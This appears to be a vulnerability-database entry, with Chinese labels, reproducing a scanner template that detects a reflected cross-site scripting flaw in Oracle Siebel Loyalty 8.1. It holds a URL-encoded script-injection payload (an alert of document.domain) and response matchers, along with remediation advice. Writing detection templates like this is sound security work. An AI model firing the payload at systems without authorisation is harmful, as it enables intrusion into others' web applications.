oracle-siebel-xss: Oracle Siebel Loyalty 8.1 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Oracle Siebel Loyalty | POC: 已公开

漏洞描述

A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint.

PoC代码[已公开]

id: oracle-siebel-xss

info:
  name: Oracle Siebel Loyalty 8.1 - Cross-Site Scripting
  author: dhiyaneshDK
  severity: high
  description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint.
  remediation: Upgrade to Siebel Loyalty version 8.2 or later.
  reference:
    - https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html
    - https://exploit-db.com/exploits/47762
    - https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,oracle,siebel,packetstorm,edb,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ca1c5161ebf78d25fd3d6e4d10886b2be5a6352ce524f5fe5317794356b3934602206f5d68488766b7addcd5b70509623ce2d5fa72faf1ae0ab9798ebba60bfabd97:922c64590222798bb761d5b6d8e72950